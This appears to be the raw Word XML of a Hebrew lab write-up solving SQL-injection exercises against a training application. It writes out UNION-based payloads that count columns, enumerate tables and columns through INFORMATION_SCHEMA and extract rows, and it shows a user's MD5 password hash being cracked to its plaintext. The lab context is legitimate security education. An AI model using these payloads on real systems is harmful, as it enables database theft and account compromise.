    <w:p w14:paraId="26FB8257" w14:textId="31F65B76" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00373C7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כעת בואו נגלה כמה עמודות יש בה ע"י חיפוש בעזרת </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ORDER BY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בממשק החיפוש.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE8BF7" w14:textId="65874DE8" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00F92E48">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92E48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00F92E48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION (SELECT * FROM users ORDER BY 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92E48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED34EA" w14:textId="12C4BD1D" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00F92E48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42BBB7" wp14:editId="2BE5B9D2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>626745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3467100" cy="2499995"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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רציתי להתחיל לבדוק את מספר העמודות, בעזרת הפקודה הנ"ל, אך קיבלתי ישר את התוצאה, כלומר מספר העמודות בטבלה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>users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שווה למספר העמודות בטבלה של הפריטים (ככל הנראה מפתח ו-4 עמודות כפי שיש בטופס ההרשמה). להלן התוצאות:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D4AE5D" w14:textId="5F1BD7AC" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00F92E48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lastRenderedPageBreak/>
        <w:t>עד כה גילינו רק מה ה-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash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של הסיסמא של וולדמורט - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F92E48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>856936</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92E48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b417f82c06139c74fa73b1abbe</w:t>
      </w:r>
      <w:r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14:paraId="4A2DCAD5" w14:textId="554A31F1" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00F92E4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נרצה למצוא את הסיסמא המקורית.</w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ניסיתי לחפש אתר שמוצא את המקור של </w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">, ואכן מצאתי את האתר </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00EC06BF" w:rsidRPr="00333A59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://hashes.com/en/decrypt/hash</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. האתר מצא את הסיסמא המקורית, שהיא </w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF" w:rsidRPr="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>horcrux</w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> והוצפנה בעזרת פונקציית </w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidR="00EC06BF"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14:paraId="4F6C64CC" w14:textId="077F7637" w:rsidR="00EC06BF" w:rsidRDefault="00EC06BF" w:rsidP="00F92E48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A0F5EF9" wp14:editId="3D11D30E">
            <wp:extent cx="5943600" cy="56134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D91F" w14:textId="6EBAC100" w:rsidR="0010282A" w:rsidRPr="00E22FAE" w:rsidRDefault="0010282A" w:rsidP="00F92E48">
      <w:pP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 w:rsidRPr="00E22FAE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t>סעיף 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B0202" w14:textId="3964E5CE" w:rsidR="0010282A" w:rsidRDefault="0010282A" w:rsidP="00F92E48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כדי למצוא את שם הטבלה נשתמש בפקודה </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B08A96B" w14:textId="73F4584D" w:rsidR="0010282A" w:rsidRDefault="0010282A" w:rsidP="0010282A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10282A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE' AND TABLE_SCHEMA='sqlitraining'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0C8BF" w14:textId="0E319C6D" w:rsidR="0010282A" w:rsidRDefault="0010282A" w:rsidP="0010282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שמחזירה את כל הטבלאות שקיימות במסד הנתונים </w:t>
      </w:r>
      <w:r w:rsidRPr="0010282A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'sqlitraining'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. נרפד את ה-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT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עם מספרים כדי להגיע לאותו מספר עמודות שצריך (5 עמודות). הפקודה שהשתמשתי בה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000CA836" w14:textId="1D33A1CB" w:rsidR="0010282A" w:rsidRPr="0010282A" w:rsidRDefault="0010282A" w:rsidP="0010282A">
      <w:pPr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r w:rsidR="007A26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10282A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION (SELECT 1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0010282A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4,TABLE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0010282A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE' AND TABLE_SCHEMA='sqlitraining')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC658C" w14:textId="42422EDD" w:rsidR="0010282A" w:rsidRDefault="0010282A" w:rsidP="0010282A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs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נקבל:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45A12C" w14:textId="74C6981A" w:rsidR="0010282A" w:rsidRPr="0010282A" w:rsidRDefault="0010282A" w:rsidP="0010282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1C621C6" wp14:editId="7649A9E2">
            <wp:extent cx="5943600" cy="774065"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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4611" w14:textId="65D62EB7" w:rsidR="00C54B11" w:rsidRPr="00C54B11" w:rsidRDefault="0010282A" w:rsidP="00C54B1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כעת גילינו שיש 3 טבלאות </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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2 שהכרנו ואחת סודית שנקראת "</w:t>
      </w:r>
      <w:r w:rsidRPr="0010282A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cyber_tableAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F975E2D" w14:textId="64CAFE0A" w:rsidR="00C54B11" w:rsidRDefault="00C54B11" w:rsidP="0010282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ראשית נגלה כמה מספר עמודות יש בה ע"י </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. 1 ו-2 הצליחו, 3 כבר נכשל, לכן יש 2 עמודות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A80C47C" w14:textId="38D5DA99" w:rsidR="00C54B11" w:rsidRDefault="00C54B11" w:rsidP="0010282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הפקודה שהשתמשתי בה היא </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2FEA48" w14:textId="621220B9" w:rsidR="00C54B11" w:rsidRDefault="00C54B11" w:rsidP="00C54B11">
      <w:pPr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' </w:t>
      </w:r>
      <w:r w:rsidRPr="00C54B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION (SELECT * FROM cyber_tableAAAAAAAAAAAAA ORDER BY 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD18672" w14:textId="03FEA655" w:rsidR="00C54B11" w:rsidRDefault="00C54B11" w:rsidP="0010282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כאשר את 1 שיניתי גם ל-2 ו-3 כדי למצוא את מספר העמודות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E28FD" w14:textId="596BE7C7" w:rsidR="00C54B11" w:rsidRDefault="005D396D" w:rsidP="0010282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כעת נרצה לגלות את שמות העמודות. נשתמש בפקודה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA79171" w14:textId="782D6438" w:rsidR="005D396D" w:rsidRDefault="005D396D" w:rsidP="005D396D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5D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'cyber_tableAAAAAAAAAAAAA'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAF56D" w14:textId="77777777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</w:p>
    <w:p w14:paraId="468E031E" w14:textId="77777777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</w:p>
    <w:p w14:paraId="7E1AF8E1" w14:textId="77777777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</w:p>
    <w:p w14:paraId="006AAD76" w14:textId="511A6ED6" w:rsidR="005D396D" w:rsidRP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lastRenderedPageBreak/>
        <w:t>כדי להשתמש בה נרפד את העמודות כדי שיהיו 5 עמודות ונשתמש ב-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8592AC" w14:textId="77777777" w:rsidR="005D396D" w:rsidRDefault="005D396D" w:rsidP="0010282A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258B4F1C" w14:textId="6BCADA94" w:rsidR="005D396D" w:rsidRDefault="005D396D" w:rsidP="005D396D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="005D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION (SELECT 1,2,3,4,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'cyber_tableAAAAAAAAAAAAA')</w:t>
      </w:r>
      <w:r w:rsidRPr="005D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60304FEF" w14:textId="1EB21943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קיבלנו כעת את שמות העמודות:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317FEA92" w14:textId="192CF5C8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301D257" wp14:editId="272A3481">
            <wp:extent cx="5943600" cy="62992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808E" w14:textId="7988CEF7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נסתכל במידע שיש בטבלה כעת. נשתמש בחיפוש:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1078E5DA" w14:textId="65B16D3E" w:rsidR="005D396D" w:rsidRDefault="005D396D" w:rsidP="005D396D">
      <w:pPr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' </w:t>
      </w:r>
      <w:r w:rsidRPr="005D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION (SELECT 1,2,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3,cyberId</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D396D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,cyberHour FROM cyber_tableAAAAAAAAAAAAA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB8553" w14:textId="4FA6CCFA" w:rsidR="005D396D" w:rsidRDefault="005D396D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ונגלה שאין כלום בטבלה. חבל!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1263E4" w14:textId="33CD34FD" w:rsidR="00E22FAE" w:rsidRDefault="00E22FAE" w:rsidP="005D396D">
      <w:pP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 w:rsidRPr="00E22FAE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t>סעיף 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA06C40" w14:textId="31C6D071" w:rsidR="00E0726E" w:rsidRDefault="00E0726E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ראשית נבדוק מהו השם של הטבלה. נשים לב שגם כאן כמו קודם הפקודה מחפשת רשומה בטבלה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>users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ומציגה לנו את הרשומה הראשונה. לכן אם נשים שם ריק (שלא קיים) ונעשה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>union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לטבלה אחרת (עם 5 עמודות), תוצג הרשומה הראשונה מהטבלה שהשתמשנו בה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33373BD2" w14:textId="6ABF7B28" w:rsidR="00E0726E" w:rsidRDefault="00E0726E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נמצא את שם הטבלה במסד הנתונים </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>secure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כמו קודם:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E5F97" w14:textId="7AE9EEF5" w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7" w:rsidRDefault="00DB0FD7" w:rsidP="00DB0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1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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4,TABLE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE' AND TABLE_SCHEMA='secure'); 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%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE4AA96" w14:textId="737486E8" w:rsidR="00E0726E" w:rsidRDefault="00E0726E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נשים לב שחשוב להוסיף רווח בסוף (%20) כדי שההערה באמת תבטל את שאר הקוד.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586879E6" w14:textId="7DA20F8C" w:rsidR="00E0726E" w:rsidRPr="00E0726E" w:rsidRDefault="00E0726E" w:rsidP="005D396D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גילינו כעת ששם הטבלה הוא </w:t>
      </w:r>
      <w:r w:rsidRPr="003B16F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'789b05678e7f955d2cf125b0c05616c9'</w:t>
      </w:r>
      <w:r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14:paraId="7A0BC3CD" w14:textId="77777777" w:rsidR="00E0726E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434218" wp14:editId="357F9B93">
            <wp:extent cx="5943600" cy="1767205"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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6913" w14:textId="77777777" w:rsidR="00E0726E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</w:p>
    <w:p w14:paraId="1F8D5136" w14:textId="77777777" w:rsidR="00E0726E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</w:p>
    <w:p w14:paraId="5EDFD450" w14:textId="733D289D" w:rsidR="00E22FAE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lastRenderedPageBreak/>
        <w:t>כעת, נרצה לבדוק את שמות העמודות בטבלה. נשתמש בפקודות הבאות, ובכל פעם נוסיף תנאי ששם העמודה יהיה שונה מהשמות שמצאנו עד כה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F69B5C" w14:textId="1B303AB9" w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7" w:rsidRDefault="00DB0FD7" w:rsidP="00DB0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1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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4,COLUMN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =</w:t>
      </w:r>
      <w:r w:rsidR="00C3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N'789b05678e7f955d2cf125b0c05616c9'); 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%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5931F" w14:textId="0C4C0E91" w:rsidR="003B16F9" w:rsidRDefault="003B16F9" w:rsidP="003B16F9">
      <w:pPr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5E0CB7" wp14:editId="61A45F21">
            <wp:extent cx="5943600" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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8A25" w14:textId="0BCAE5F9" w:rsidR="00E0726E" w:rsidRPr="003B16F9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בפעם הראשונה מצאנו את העמודה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. כעת נוסיף תנאי ששם העמודה חייב להיות שונה מ-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2B1A0" w14:textId="27B804E5" w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7" w:rsidRDefault="00DB0FD7" w:rsidP="00DB0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1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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4,COLUMN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'789b05678e7f955d2cf125b0c05616c9' AND COLUMN_NAME &lt;&gt; 'id'); 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%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7DF4A" w14:textId="01E546B2" w:rsidR="003B16F9" w:rsidRDefault="003B16F9" w:rsidP="003B16F9">
      <w:pPr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FC77AB" wp14:editId="51022B24">
            <wp:extent cx="5943600" cy="180975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C7D8" w14:textId="5C15F73B" w:rsidR="00E0726E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כעת מצאנו את העמודה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. נוסיף גם אותה לתנאי:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E6E60" w14:textId="59A09E34" w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7" w:rsidRDefault="00DB0FD7" w:rsidP="00DB0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1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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4,COLUMN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'789b05678e7f955d2cf125b0c05616c9' AND COLUMN_NAME &lt;&gt; 'id' AND COLUMN_NAME &lt;&gt; 'random'); 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%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290AE59" w14:textId="645F94B9" w:rsidR="003B16F9" w:rsidRDefault="003B16F9" w:rsidP="003B16F9">
